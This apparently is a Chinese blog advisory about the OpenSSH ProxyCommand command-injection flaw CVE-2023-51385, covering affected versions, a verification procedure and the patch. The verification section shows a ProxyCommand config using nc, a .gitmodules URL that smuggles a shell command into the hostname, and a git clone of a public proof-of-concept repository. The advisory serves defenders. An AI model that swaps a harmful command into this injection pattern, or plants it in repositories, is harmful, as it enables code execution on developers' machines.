IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385)

    C1G发表于 2024-04-01 07:10:48
    love 0

    一、背景描述

    OpenSSH是SSH(Secure SHell)协议的免费开源实现。OpenSSH提供了服务端后台程序和客户端工具,用来加密远程控制和文件传输过程中的数据,并由此来代替原来的类似服务。

    OpenSSH发布了安全更新,修复了一个命令注入漏洞,编号命名为CVE-2023-51385。攻击者可以利用该漏洞注入恶意shell字符进行命令注入攻击。

    该漏洞利用条件较为苛刻,但由于漏洞利用POC已公开,建议受影响用户及时进行修补更新,做好相关防护措施。

    二、严重等级

    高危

    三、漏洞描述

    该漏洞与配置文件ssh_config有关,攻击者可以修改配置文件中的ProxyCommand、LocalCommand、Match exec相关命令,通过%h、%p或类似的扩展标记引用主机名或用户名,在建立SSH连接时,注入恶意shell字符进行命令注入攻击。

    四、影响范围

    OpenSSH < 9.6

    五、CVE-2023-51385 验证方法:

    首先需要在~/.ssh/config增加如下

    host *.example.com
    ProxyCommand /usr/bin/nc -X connect -x 192.0.2.0:8080 %h %p
    .gitmodules文件语句中存在命令注入

    url = ssh://echo helloworld > cve.txtfoo.example.com/bar
    配置完成后,执行下面的指令触发

    git clone https://github.com/zls1793/CVE-2023-51385_test –recurse-submodules
    如果成功执行将会在CVE-2023-51385_test目录下生成cve.txt文件

    六、解决方案

    目前官方已修复该漏洞,受影响用户请根据自身情况尽快更新至对应的安全版本:https://www.openssh.com/openbsd.html

    该漏洞具体详情可参考如下链接:

    https://vin01.github.io/piptagole/ssh/security/openssh/libssh/remote-code-execution/2023/12/20/openssh-proxycommand-libssh-rce.html

    The post OpenSSH ProxyCommand命令注入漏洞(CVE-2023-51385) first appeared on C1G军火库.



沪ICP备19023445号-2号
友情链接